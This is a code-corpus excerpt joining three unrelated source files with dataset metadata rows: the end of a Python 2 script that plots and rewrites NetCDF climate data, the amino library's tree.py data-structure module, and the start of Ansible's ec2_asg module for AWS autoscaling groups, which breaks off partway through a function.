print '\t%s:' % nc_attr, repr(nc_fid.getncattr(nc_attr))
nc_dims = [dim for dim in nc_fid.dimensions] # list of nc dimensions
# Dimension shape information.
if verb:
print "NetCDF dimension information:"
for dim in nc_dims:
print "\tName:", dim
print "\t\tsize:", len(nc_fid.dimensions[dim])
print_ncattr(dim)
# Variable information.
nc_vars = [var for var in nc_fid.variables] # list of nc variables
if verb:
print "NetCDF variable information:"
for var in nc_vars:
if var not in nc_dims:
print '\tName:', var
print "\t\tdimensions:", nc_fid.variables[var].dimensions
print "\t\tsize:", nc_fid.variables[var].size
print_ncattr(var)
return nc_attrs, nc_dims, nc_vars
nc_f = './CLM45_Micro_UW_SRF.2005120100.for.test.nc' # Your filename
nc_fid = Dataset(nc_f, 'r') # Dataset is the class behavior to open the file
# and create an instance of the ncCDF4 class
nc_attrs, nc_dims, nc_vars = ncdump(nc_fid)
# Extract data from NetCDF file
lats = nc_fid.variables['xlat'][:] # extract/copy the data
lons = nc_fid.variables['xlon'][:]
time = nc_fid.variables['time'][:]
rsds = nc_fid.variables['rsds'][:] # shape is time, lat, lon as shown above
time_idx = 237 # some random day in 2012
# Python and the reanalysis are slightly off in time so this fixes that problem
offset = dt.timedelta(hours=48)
# List of all times in the file as datetime objects
dt_time = [dt.date(1, 1, 1) + dt.timedelta(hours=t/20) - offset\
for t in time]
cur_time = dt_time[time_idx]
# Plot of global temperature on our random day
fig = plt.figure()
fig.subplots_adjust(left=0., right=1., bottom=0., top=0.9)
# Setup the map. See http://matplotlib.org/basemap/users/mapsetup.html
# for other projections.
m = Basemap(projection='moll', llcrnrlat=-90, urcrnrlat=90,\
llcrnrlon=0, urcrnrlon=360, resolution='c', lon_0=0)
m.drawcoastlines()
m.drawmapboundary()
# Make the plot continuous
test=rsds[0,:,:]
print test.shape
print rsds.shape
print lons.shape
rsds_cyclic, lons_cyclic = addcyclic(rsds[time_idx,:,:], lons)
# Shift the grid so lons go from -180 to 180 instead of 0 to 360.
rsds_cyclic, lons_cyclic = shiftgrid(180., rsds_cyclic, lons_cyclic, start=False)
# Create 2D lat/lon arrays for Basemap
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
# Transforms lat/lon into plotting coordinates for projection
x, y = m(lon2d, lat2d)
# Plot of rsds temperature with 11 contour intervals
cs = m.contourf(x, y, rsds_cyclic, 11, cmap=plt.cm.Spectral_r)
cbar = plt.colorbar(cs, orientation='horizontal', shrink=0.5)
cbar.set_label("%s (%s)" % (nc_fid.variables['rsds'].var_desc,\
nc_fid.variables['rsds'].units))
plt.title("%s on %s" % (nc_fid.variables['rsds'].var_desc, cur_time))
# Writing NetCDF files
# For this example, we will create two NetCDF4 files. One with the global rsds
# temperature departure from its value at Darwin, Australia. The other with
# the temperature profile for the entire year at Darwin.
darwin = {'name': 'Darwin, Australia', 'lat': -12.45, 'lon': 130.83}
# Find the nearest latitude and longitude for Darwin
lat_idx = np.abs(lats - darwin['lat']).argmin()
lon_idx = np.abs(lons - darwin['lon']).argmin()
# Simple example: temperature profile for the entire year at Darwin.
# Open a new NetCDF file to write the data to. For format, you can choose from
# 'NETCDF3_CLASSIC', 'NETCDF3_64BIT', 'NETCDF4_CLASSIC', and 'NETCDF4'
w_nc_fid = Dataset('darwin_2012.nc', 'w', format='NETCDF4')
w_nc_fid.description = "NCEP/NCAR Reanalysis %s from its value at %s. %s" %\
(nc_fid.variables['rsds'].var_desc.lower(),\
darwin['name'], nc_fid.description)
# Using our previous dimension info, we can create the new time dimension
# Even though we know the size, we are going to set the size to unknown
w_nc_fid.createDimension('time', None)
w_nc_dim = w_nc_fid.createVariable('time', nc_fid.variables['time'].dtype,\
('time',))
# You can do this step yourself but someone else did the work for us.
for ncattr in nc_fid.variables['time'].ncattrs():
w_nc_dim.setncattr(ncattr, nc_fid.variables['time'].getncattr(ncattr))
# Assign the dimension data to the new NetCDF file.
w_nc_fid.variables['time'][:] = time
w_nc_var = w_nc_fid.createVariable('rsds', 'f8', ('time'))
w_nc_var.setncatts({'long_name': u"mean Daily Air temperature",\
'units': u"degK", 'level_desc': u'Surface',\
'var_desc': u"Air temperature",\
'statistic': u'Mean\nM'})
w_nc_fid.variables['rsds'][:] = rsds[time_idx, lat_idx, lon_idx]
w_nc_fid.close() # close the new file
# A plot of the temperature profile for Darwin in 2012
fig = plt.figure()
plt.plot(dt_time, rsds[:, lat_idx, lon_idx], c='r')
plt.plot(dt_time[time_idx], rsds[time_idx, lat_idx, lon_idx], c='b', marker='o')
plt.text(dt_time[time_idx], rsds[time_idx, lat_idx, lon_idx], cur_time,\
ha='right')
fig.autofmt_xdate()
plt.ylabel("%s (%s)" % (nc_fid.variables['rsds'].var_desc,\
nc_fid.variables['rsds'].units))
plt.xlabel("Time")
plt.title("%s from\n%s for %s" % (nc_fid.variables['rsds'].var_desc,\
darwin['name'], cur_time.year))
# Complex example: global temperature departure from its value at Darwin
departure = rsds[:, :, :] - rsds[:, lat_idx, lon_idx].reshape((time.shape[0],\
1, 1))
# Open a new NetCDF file to write the data to. For format, you can choose from
# 'NETCDF3_CLASSIC', 'NETCDF3_64BIT', 'NETCDF4_CLASSIC', and 'NETCDF4'
w_nc_fid = Dataset('rsds.departure.sig995.2012.nc', 'w', format='NETCDF4')
w_nc_fid.description = "The departure of the NCEP/NCAR Reanalysis " +\
"%s from its value at %s. %s" %\
(nc_fid.variables['rsds'].var_desc.lower(),\
darwin['name'], nc_fid.description)
# Using our previous dimension information, we can create the new dimensions
data = {}
for dim in nc_dims:
w_nc_fid.createDimension(dim, nc_fid.variables[dim].size)
data[dim] = w_nc_fid.createVariable(dim, nc_fid.variables[dim].dtype,\
(dim,))
# You can do this step yourself but someone else did the work for us.
for ncattr in nc_fid.variables[dim].ncattrs():
data[dim].setncattr(ncattr, nc_fid.variables[dim].getncattr(ncattr))
# Assign the dimension data to the new NetCDF file.
w_nc_fid.variables['time'][:] = time
w_nc_fid.variables['lat'][:] = lats
w_nc_fid.variables['lon'][:] = lons
# Ok, time to create our departure variable
w_nc_var = w_nc_fid.createVariable('rsds_dep', 'f8', ('time', 'lat', 'lon'))
w_nc_var.setncatts({'long_name': u"mean Daily Air temperature departure",\
'units': u"degK", 'level_desc': u'Surface',\
'var_desc': u"Air temperature departure",\
'statistic': u'Mean\nM'})
w_nc_fid.variables['rsds_dep'][:] = departure
w_nc_fid.close() # close the new file
# Rounded maximum absolute value of the departure used for contouring
max_dep = np.round(np.abs(departure[time_idx, :, :]).max()+5., decimals=-1)
# Generate a figure of the departure for a single day
fig = plt.figure()
fig.subplots_adjust(left=0., right=1., bottom=0., top=0.9)
m = Basemap(projection='moll', llcrnrlat=-90, urcrnrlat=90,\
llcrnrlon=0, urcrnrlon=360, resolution='c', lon_0=0)
m.drawcoastlines()
m.drawmapboundary()
dep_cyclic, lons_cyclic = addcyclic(departure[time_idx, :, :], lons)
dep_cyclic, lons_cyclic = shiftgrid(180., dep_cyclic, lons_cyclic, start=False)
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
x, y = m(lon2d, lat2d)
levels = np.linspace(-max_dep, max_dep, 11)
cs = m.contourf(x, y, dep_cyclic, levels=levels, cmap=plt.cm.bwr)
x, y = m(darwin['lon'], darwin['lat'])
plt.plot(x, y, c='c', marker='o')
plt.text(x, y, 'Darwin,\nAustralia', color='r', weight='semibold')
cbar = plt.colorbar(cs, orientation='horizontal', shrink=0.5)
cbar.set_label("%s departure (%s)" % (nc_fid.variables['rsds'].var_desc,\
nc_fid.variables['rsds'].units))
plt.title("Departure of Global %s from\n%s for %s" %\
(nc_fid.variables['rsds'].var_desc, darwin['name'], cur_time))
plt.show()
# Close original NetCDF file.
nc_fid.close()
|
gpl-3.0
| 2,362,746,802,840,747,500
| 42.633065
| 81
| 0.641253
| false
| 3.204323
| false
| false
| false
|
tek/amino
|
amino/tree.py
|
1
|
14049
|
import abc
from typing import Callable, TypeVar, Generic, Union, cast, Any
from amino.logging import Logging
from amino import LazyList, Boolean, __, _, Either, Right, Maybe, Left, L, Map, curried
from amino.boolean import false, true
from amino.tc.base import Implicits
from amino.tc.flat_map import FlatMap
from amino.func import call_by_name
from amino.lazy_list import LazyLists
def indent(strings: LazyList[str]) -> LazyList[str]:
return strings.map(' ' + _)
Data = TypeVar('Data')
Data1 = TypeVar('Data1')
Sub = TypeVar('Sub')
Sub1 = TypeVar('Sub1')
A = TypeVar('A')
B = TypeVar('B')
Z = TypeVar('Z')
Key = Union[str, int]
class Node(Generic[Data, Sub], Logging, abc.ABC, Implicits, implicits=True, auto=True):
@abc.abstractproperty
def sub(self) -> Sub:
...
@abc.abstractproperty
def sub_l(self) -> LazyList['Node[Data, Any]']:
...
@abc.abstractmethod
def _strings(self) -> LazyList[str]:
...
@property
def strings(self) -> LazyList[str]:
return self._strings()
def _show(self) -> str:
return self._strings().mk_string('\n')
@property
def show(self) -> str:
return self._show()
@abc.abstractmethod
def foreach(self, f: Callable[['Node'], None]) -> None:
...
@abc.abstractmethod
def filter(self, pred: Callable[['Node'], bool]) -> 'Node':
...
def filter_not(self, pred: Callable[['Node'], bool]) -> 'Node':
return self.filter(lambda a: not pred(a))
@abc.abstractproperty
def flatten(self) -> 'LazyList[Any]':
...
@abc.abstractmethod
def contains(self, target: 'Node') -> Boolean:
...
@abc.abstractmethod
def lift(self, key: Key) -> 'SubTree':
...
def __getitem__(self, key: Key) -> 'SubTree':
return self.lift(key)
@abc.abstractproperty
def s(self) -> 'SubTree':
...
@abc.abstractproperty
def empty(self) -> Boolean:
...
@curried
def fold_left(self, z: Z, f: Callable[[Z, 'Node'], Z]) -> Z:
z1 = f(z, self)
return self.sub_l.fold_left(z1)(lambda z2, a: a.fold_left(z2)(f))
@abc.abstractmethod
def replace(self, data: LazyList['Node[Data1, Sub1]']) -> 'Node[Data1, Sub1]':
...
@abc.abstractmethod
def map_nodes(self, f: Callable[['Node[Data, Sub]'], 'Node[Data, Sub]']) -> 'Node[Data, Sub]':
...
class Inode(Generic[Data, Sub], Node[Data, Sub]):
@abc.abstractproperty
def sub(self) -> LazyList[Any]:
...
def foreach(self, f: Callable[[Node], None]) -> None:
f(self)
self.sub_l.foreach(__.foreach(f))
@property
def flatten(self) -> LazyList[Any]:
return self.sub_l.flat_map(_.flatten).cons(self)
def contains(self, target: Node) -> Boolean:
return self.sub_l.contains(target)
@property
def empty(self) -> Boolean:
return self.data.empty
class ListNode(Generic[Data], Inode[Data, LazyList[Node[Data, Any]]]):
def __init__(self, sub: LazyList[Node[Data, Any]]) -> None:
self.data = sub
@property
def sub(self) -> LazyList[Node[Data, Any]]:
return self.data
@property
def sub_l(self) -> LazyList[Node[Data, Any]]:
return self.sub
@property
def _desc(self) -> str:
return '[]'
def _strings(self) -> LazyList[str]:
return indent(self.sub // (lambda a: a._strings())).cons(self._desc)
@property
def head(self) -> 'SubTree':
return self.lift(0)
@property
def last(self) -> 'SubTree':
return self.lift(-1)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.sub.map(str).mk_string(','))
def __repr__(self) -> str:
return str(self)
def lift(self, key: Key) -> 'SubTree':
return (
SubTreeInvalid(key, 'ListNode index must be int')
if isinstance(key, str) else
self.sub.lift(key) / L(SubTree.cons)(_, key) | (lambda: SubTreeInvalid(key, 'ListNode index oob'))
)
def replace(self, sub: LazyList[Any]) -> Node:
return ListNode(sub)
def filter(self, pred: Callable[[Node], bool]) -> Node:
def filt(n: Node) -> bool:
return (
pred(n)
if isinstance(n, LeafNode) else
not n.empty
)
return self.replace(self.sub.map(__.filter(pred)).filter(filt))
@property
def s(self) -> 'SubTree':
return SubTreeList(self, 'root')
def map_nodes(self, f: Callable[['Node[Data, Sub]'], 'Node[Data, Sub]']) -> 'Node[Data, Sub]':
return f(ListNode(self.sub.map(lambda a: a.map_nodes(f))))
class MapNode(Generic[Data], Inode[Data, Map[str, Node[Data, Any]]]):
def __init__(self, data: Map[str, Node[Data, Any]]) -> None:
self.data = data
@property
def sub(self) -> Map[str, Node[Data, Any]]:
return self.data
@property
def sub_l(self) -> LazyList[Node[Data, Any]]:
return LazyList(self.data.v)
@property
def _desc(self) -> str:
return '{}'
def _strings(self) -> LazyList[str]:
return indent(self.sub_l // (lambda a: a._strings())).cons(self._desc)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.sub_l)
def __repr__(self) -> str:
return str(self)
# TODO allow int indexes into sub_l
def lift(self, key: Key) -> 'SubTree':
def err() -> 'SubTree':
keys = ', '.join(self.data.keys())
return SubTreeInvalid(key, f'MapNode({self.rule}) invalid key ({keys})')
return (
self.data.lift(key) /
L(SubTree.cons)(_, key) |
err
)
def replace(self, sub: Map[str, Node]) -> Node:
return MapNode(sub)
def filter(self, pred: Callable[[Node], bool]) -> Node:
def filt(n: Node) -> bool:
return (
pred(n)
if isinstance(n, LeafNode) else
not n.empty
)
return self.replace(self.data.valmap(__.filter(pred)).valfilter(filt))
@property
def s(self) -> 'SubTree':
return SubTreeMap(self, 'root')
def map_nodes(self, f: Callable[['Node[Data, Sub]'], 'Node[Data, Sub]']) -> 'Node[Data, Sub]':
return f(MapNode(self.sub.valmap(lambda a: a.map_nodes(f))))
class LeafNode(Generic[Data], Node[Data, None]):
def __init__(self, data: Data) -> None:
self.data = data
def _strings(self) -> LazyList[Data]:
return LazyLists.cons(self.data)
@property
def sub(self) -> None:
pass
@property
def sub_l(self) -> LazyList[Node[Data, Any]]:
return LazyList([])
def foreach(self, f: Callable[[Node], None]) -> None:
f(self)
def filter(self, pred: Callable[[Node], bool]) -> Node:
return self
@property
def flatten(self) -> LazyList[Any]:
return LazyLists.cons(self)
def contains(self, target: Node) -> Boolean:
return false
def lift(self, key: Key) -> 'SubTree':
return SubTreeInvalid(key, 'LeafNode cannot be indexed')
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.data)
def __repr__(self) -> str:
return str(self)
@property
def empty(self) -> Boolean:
return false
@property
def s(self) -> 'SubTree':
return SubTreeLeaf(self, 'root')
def replace(self, sub: Data) -> Node:
return LeafNode(sub)
def map_nodes(self, f: Callable[['Node[Data, Sub]'], 'Node[Data, Sub]']) -> 'Node[Data, Sub]':
return f(self)
class TreeFlatMap(FlatMap, tpe=Node):
def flat_map(self, fa: Node[A, Any], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
return (
self.flat_map_inode(fa, f)
if isinstance(fa, Inode) else
self.flat_map_leaf(fa, f)
)
def flat_map_inode(self, fa: Inode[A, Any], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
def err() -> Inode[A, Any]:
raise Exception(f'invalid sub for `TreeFlatMap.flat_map_inode`: {fa}')
return (
self.flat_map_map(fa, f)
if isinstance(fa, MapNode) else
self.flat_map_list(fa, f)
if isinstance(fa, ListNode) else
err()
)
def flat_map_map(self, fa: MapNode[A], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
return MapNode(fa.sub.valmap(lambda a: self.flat_map(a, f)))
def flat_map_list(self, fa: ListNode[A], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
return ListNode(fa.sub.map(lambda a: self.flat_map(a, f)))
def flat_map_leaf(self, fa: LeafNode[A], f: Callable[[A], Node[B, Any]]) -> Node[B, Any]:
return f(fa.data)
def map(self, fa: Node[A, Any], f: Callable[[A], B]) -> Node[B, Any]:
return (
self.map_inode(fa, f)
if isinstance(fa, Inode) else
self.map_leaf(fa, f)
)
def map_inode(self, fa: Inode[A, Any], f: Callable[[A], B]) -> Node[B, Any]:
def err() -> Inode[A, Any]:
raise Exception(f'invalid sub for `TreeFlatMap.map_inode`: {fa}')
return (
self.map_map(fa, f)
if isinstance(fa, MapNode) else
self.map_list(fa, f)
if isinstance(fa, ListNode) else
err()
)
def map_map(self, fa: MapNode[A], f: Callable[[A], B]) -> Node[B, Any]:
return MapNode(fa.data.valmap(lambda a: self.map(a, f)))
def map_list(self, fa: ListNode[A], f: Callable[[A], B]) -> Node[B, Any]:
return ListNode(fa.sub.map(lambda a: self.map(a, f)))
def map_leaf(self, fa: LeafNode[A], f: Callable[[A], B]) -> Node[B, Any]:
return LeafNode(f(fa.data))
class SubTree(Implicits, implicits=True, auto=True):
@staticmethod
def cons(fa: Node, key: Key) -> 'SubTree':
return ( # type: ignore
cast(SubTree, SubTreeList(fa, key))
if isinstance(fa, ListNode) else
SubTreeLeaf(fa, key)
if isinstance(fa, LeafNode) else
SubTreeMap(fa, key)
)
@staticmethod
def from_maybe(data: Maybe[Node], key: Key, err: str) -> 'SubTree':
return data.cata(SubTree.cons, SubTreeInvalid(key, err))
def __getattr__(self, key: Key) -> 'SubTree':
try:
return super().__getattr__(key)
except AttributeError:
return self._getattr(key)
@abc.abstractmethod
def _getattr(self, key: Key) -> 'SubTree':
...
def __getitem__(self, key: Key) -> 'SubTree':
return self._getitem(key)
@abc.abstractmethod
def _getitem(self, key: Key) -> 'SubTree':
...
def cata(self, f: Callable[[Node], A], b: Union[A, Callable[[], A]]) -> A:
return (
f(self.data)
if isinstance(self, SubTreeValid)
else call_by_name(b)
)
@abc.abstractproperty
def e(self) -> Either[str, Node]:
...
@abc.abstractproperty
def valid(self) -> Boolean:
...
@abc.abstractproperty
def strings(self) -> LazyList[str]:
...
@abc.abstractproperty
    def show(self) -> str:
...
@property
def rule(self) -> Either[str, str]:
return self.e.map(_.rule)
class SubTreeValid(SubTree):
def __init__(self, data: Node, key: Key) -> None:
self.data = data
self._key = key
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.data)
@property
def e(self) -> Either[str, Node]:
return Right(self.data)
@property
def valid(self) -> Boolean:
return true
@property
def strings(self) -> LazyList[str]:
return self.data.strings
@property
def show(self) -> str:
return self.data.show
class SubTreeList(SubTreeValid):
@property
def head(self) -> SubTree:
return self[0]
@property
def last(self) -> SubTree:
return self[-1]
def _getattr(self, key: Key) -> SubTree:
return SubTreeInvalid(key, 'cannot access attrs in SubTreeList')
def _getitem(self, key: Key) -> SubTree:
return self.data.lift(key)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.data.sub_l.drain.join_comma)
@property
def _keys(self) -> LazyList[str]:
return self.data.k
class SubTreeLeaf(SubTreeValid):
def err(self, key: Key) -> SubTree:
return SubTreeInvalid(key, 'cannot access attrs in SubTreeLeaf')
def _getattr(self, key: Key) -> SubTree:
return self.err(key)
def _getitem(self, key: Key) -> SubTree:
return self.err(key)
class SubTreeMap(SubTreeValid):
def _getattr(self, key: Key) -> SubTree:
return self.data.lift(key)
def _getitem(self, key: Key) -> SubTree:
return self.data.lift(key)
@property
def _keys(self) -> LazyList[str]:
return self.data.k
class SubTreeInvalid(SubTree):
def __init__(self, key: Key, reason: str) -> None:
self.key = key
self.reason = reason
def __str__(self) -> str:
s = 'SubTreeInvalid({}, {})'
return s.format(self.key, self.reason)
def __repr__(self) -> str:
return str(self)
@property
def valid(self) -> Boolean:
return false
@property
def _error(self) -> str:
return 'no subtree `{}`: {}'.format(self.key, self.reason)
def _getattr(self, key: Key) -> SubTree:
return self
def _getitem(self, key: Key) -> SubTree:
return self
@property
def e(self) -> Either[str, Node]:
return Left(self._error)
@property
def strings(self) -> LazyList[str]:
return LazyList([])
@property
    def show(self) -> str:
return str(self)
__all__ = ('Node', 'Inode', 'LeafNode', 'MapNode', 'ListNode')
|
mit
| -5,395,947,376,289,710,000
| 25.76
| 110
| 0.55947
| false
| 3.380414
| false
| false
| false
|
KyleJamesWalker/ansible-modules-core
|
cloud/amazon/ec2_asg.py
|
1
|
34388
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: ec2_asg
short_description: Create or delete AWS Autoscaling Groups
description:
- Can create or delete AWS Autoscaling Groups
- Works with the ec2_lc module to manage Launch Configurations
version_added: "1.6"
author: "Gareth Rushgrove (@garethr)"
options:
state:
description:
- register or deregister the instance
required: true
choices: ['present', 'absent']
name:
description:
- Unique name for group to be created or deleted
required: true
load_balancers:
description:
- List of ELB names to use for the group
required: false
availability_zones:
description:
- List of availability zone names in which to create the group. Defaults to all the availability zones in the region if vpc_zone_identifier is not set.
required: false
launch_config_name:
description:
- Name of the Launch configuration to use for the group. See the ec2_lc module for managing these.
required: true
min_size:
description:
- Minimum number of instances in group, if unspecified then the current group value will be used.
required: false
max_size:
description:
- Maximum number of instances in group, if unspecified then the current group value will be used.
required: false
desired_capacity:
description:
- Desired number of instances in group, if unspecified then the current group value will be used.
required: false
replace_all_instances:
description:
      - In a rolling fashion, replace all instances that use an old launch configuration with instances using the current launch configuration.
required: false
version_added: "1.8"
default: False
replace_batch_size:
description:
- Number of instances you'd like to replace at a time. Used with replace_all_instances.
required: false
version_added: "1.8"
default: 1
replace_instances:
description:
- List of instance_ids belonging to the named ASG that you would like to terminate and be replaced with instances matching the current launch configuration.
required: false
version_added: "1.8"
default: None
lc_check:
description:
      - Check to make sure instances that are being replaced with replace_instances do not already have the current launch_config.
required: false
version_added: "1.8"
default: True
vpc_zone_identifier:
description:
- List of VPC subnets to use
required: false
default: None
tags:
description:
- A list of tags to add to the Auto Scale Group. Optional key is 'propagate_at_launch', which defaults to true.
required: false
default: None
version_added: "1.7"
health_check_period:
description:
- Length of time in seconds after a new EC2 instance comes into service that Auto Scaling starts checking its health.
required: false
    default: 300 seconds
version_added: "1.7"
health_check_type:
description:
- The service you want the health status from, Amazon EC2 or Elastic Load Balancer.
required: false
default: EC2
version_added: "1.7"
choices: ['EC2', 'ELB']
default_cooldown:
description:
- The number of seconds after a scaling activity completes before another can begin.
required: false
default: 300 seconds
version_added: "2.0"
wait_timeout:
description:
      - How long to wait for instances to become viable when replaced. Used in conjunction with the replace_instances option.
default: 300
version_added: "1.8"
wait_for_instances:
description:
- Wait for the ASG instances to be in a ready state before exiting. If instances are behind an ELB, it will wait until the ELB determines all instances have a lifecycle_state of "InService" and a health_status of "Healthy".
version_added: "1.9"
default: yes
required: False
termination_policies:
description:
- An ordered list of criteria used for selecting instances to be removed from the Auto Scaling group when reducing capacity.
      - For 'Default', when used to create a new autoscaling group, the "Default" value is used. When used to change an existing autoscaling group, the current termination policies are maintained.
required: false
default: Default
choices: ['OldestInstance', 'NewestInstance', 'OldestLaunchConfiguration', 'ClosestToNextInstanceHour', 'Default']
version_added: "2.0"
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = '''
# Basic configuration
- ec2_asg:
name: special
load_balancers: [ 'lb1', 'lb2' ]
availability_zones: [ 'eu-west-1a', 'eu-west-1b' ]
launch_config_name: 'lc-1'
min_size: 1
max_size: 10
desired_capacity: 5
vpc_zone_identifier: [ 'subnet-abcd1234', 'subnet-1a2b3c4d' ]
tags:
- environment: production
propagate_at_launch: no
# Rolling ASG Updates
Below is an example of how to assign a new launch config to an ASG and terminate old instances.
All instances in "myasg" that do not have the launch configuration named "my_new_lc" will be terminated in
a rolling fashion with instances using the current launch configuration, "my_new_lc".
This could also be considered a rolling deploy of a pre-baked AMI.
If this is a newly created group, the instances will not be replaced since all instances
will have the current launch configuration.
- name: create launch config
ec2_lc:
name: my_new_lc
image_id: ami-lkajsf
key_name: mykey
region: us-east-1
security_groups: sg-23423
instance_type: m1.small
assign_public_ip: yes
- ec2_asg:
name: myasg
launch_config_name: my_new_lc
health_check_period: 60
health_check_type: ELB
replace_all_instances: yes
min_size: 5
max_size: 5
desired_capacity: 5
region: us-east-1
To only replace a couple of instances instead of all of them, supply a list
to "replace_instances":
- ec2_asg:
name: myasg
launch_config_name: my_new_lc
health_check_period: 60
health_check_type: ELB
replace_instances:
- i-b345231
- i-24c2931
min_size: 5
max_size: 5
desired_capacity: 5
region: us-east-1
'''
import time
import logging as log
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
log.getLogger('boto').setLevel(log.CRITICAL)
#log.basicConfig(filename='/tmp/ansible_ec2_asg.log',level=log.DEBUG, format='%(asctime)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
try:
import boto.ec2.autoscale
from boto.ec2.autoscale import AutoScaleConnection, AutoScalingGroup, Tag
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
ASG_ATTRIBUTES = ('availability_zones', 'default_cooldown', 'desired_capacity',
'health_check_period', 'health_check_type', 'launch_config_name',
'load_balancers', 'max_size', 'min_size', 'name', 'placement_group',
'termination_policies', 'vpc_zone_identifier')
INSTANCE_ATTRIBUTES = ('instance_id', 'health_status', 'lifecycle_state', 'launch_config_name')
def enforce_required_arguments(module):
''' As many arguments are not required for autoscale group deletion
they cannot be mandatory arguments for the module, so we enforce
them here '''
missing_args = []
for arg in ('min_size', 'max_size', 'launch_config_name'):
if module.params[arg] is None:
missing_args.append(arg)
if missing_args:
module.fail_json(msg="Missing required arguments for autoscaling group create/update: %s" % ",".join(missing_args))
def get_properties(autoscaling_group):
properties = dict((attr, getattr(autoscaling_group, attr)) for attr in ASG_ATTRIBUTES)
# Ugly hack to make this JSON-serializable. We take a list of boto Tag
# objects and replace them with a dict-representation. Needed because the
# tags are included in ansible's return value (which is jsonified)
if 'tags' in properties and isinstance(properties['tags'], list):
serializable_tags = {}
for tag in properties['tags']:
serializable_tags[tag.key] = [tag.value, tag.propagate_at_launch]
properties['tags'] = serializable_tags
properties['healthy_instances'] = 0
properties['in_service_instances'] = 0
properties['unhealthy_instances'] = 0
properties['pending_instances'] = 0
properties['viable_instances'] = 0
properties['terminating_instances'] = 0
instance_facts = {}
if autoscaling_group.instances:
properties['instances'] = [i.instance_id for i in autoscaling_group.instances]
for i in autoscaling_group.instances:
instance_facts[i.instance_id] = {'health_status': i.health_status,
'lifecycle_state': i.lifecycle_state,
'launch_config_name': i.launch_config_name }
if i.health_status == 'Healthy' and i.lifecycle_state == 'InService':
properties['viable_instances'] += 1
if i.health_status == 'Healthy':
properties['healthy_instances'] += 1
else:
properties['unhealthy_instances'] += 1
if i.lifecycle_state == 'InService':
properties['in_service_instances'] += 1
if i.lifecycle_state == 'Terminating':
properties['terminating_instances'] += 1
if i.lifecycle_state == 'Pending':
properties['pending_instances'] += 1
properties['instance_facts'] = instance_facts
properties['load_balancers'] = autoscaling_group.load_balancers
if getattr(autoscaling_group, "tags", None):
properties['tags'] = dict((t.key, t.value) for t in autoscaling_group.tags)
return properties
def elb_dreg(asg_connection, module, group_name, instance_id):
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
as_group = asg_connection.get_all_groups(names=[group_name])[0]
wait_timeout = module.params.get('wait_timeout')
props = get_properties(as_group)
count = 1
if as_group.load_balancers and as_group.health_check_type == 'ELB':
try:
elb_connection = connect_to_aws(boto.ec2.elb, region, **aws_connect_params)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=str(e))
else:
return
for lb in as_group.load_balancers:
elb_connection.deregister_instances(lb, instance_id)
log.debug("De-registering {0} from ELB {1}".format(instance_id, lb))
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time() and count > 0:
count = 0
for lb in as_group.load_balancers:
lb_instances = elb_connection.describe_instance_health(lb)
for i in lb_instances:
if i.instance_id == instance_id and i.state == "InService":
count += 1
log.debug("{0}: {1}, {2}".format(i.instance_id, i.state, i.description))
time.sleep(10)
if wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "Waited too long for instance to deregister. {0}".format(time.asctime()))
def elb_healthy(asg_connection, elb_connection, module, group_name):
healthy_instances = []
as_group = asg_connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
# get healthy, inservice instances from ASG
instances = []
for instance, settings in props['instance_facts'].items():
if settings['lifecycle_state'] == 'InService' and settings['health_status'] == 'Healthy':
instances.append(instance)
log.debug("ASG considers the following instances InService and Healthy: {0}".format(instances))
log.debug("ELB instance status:")
for lb in as_group.load_balancers:
# we catch a race condition that sometimes happens if the instance exists in the ASG
        # but has not yet shown up in the ELB
try:
lb_instances = elb_connection.describe_instance_health(lb, instances=instances)
except boto.exception.InvalidInstance:
pass
for i in lb_instances:
if i.state == "InService":
healthy_instances.append(i.instance_id)
log.debug("{0}: {1}".format(i.instance_id, i.state))
return len(healthy_instances)
def wait_for_elb(asg_connection, module, group_name):
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
wait_timeout = module.params.get('wait_timeout')
# if the health_check_type is ELB, we want to query the ELBs directly for instance
# status as to avoid health_check_grace period that is awarded to ASG instances
as_group = asg_connection.get_all_groups(names=[group_name])[0]
if as_group.load_balancers and as_group.health_check_type == 'ELB':
log.debug("Waiting for ELB to consider intances healthy.")
try:
elb_connection = connect_to_aws(boto.ec2.elb, region, **aws_connect_params)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=str(e))
wait_timeout = time.time() + wait_timeout
healthy_instances = elb_healthy(asg_connection, elb_connection, module, group_name)
while healthy_instances < as_group.min_size and wait_timeout > time.time():
healthy_instances = elb_healthy(asg_connection, elb_connection, module, group_name)
log.debug("ELB thinks {0} instances are healthy.".format(healthy_instances))
time.sleep(10)
if wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "Waited too long for ELB instances to be healthy. %s" % time.asctime())
log.debug("Waiting complete. ELB thinks {0} instances are healthy.".format(healthy_instances))
def create_autoscaling_group(connection, module):
group_name = module.params.get('name')
load_balancers = module.params['load_balancers']
availability_zones = module.params['availability_zones']
launch_config_name = module.params.get('launch_config_name')
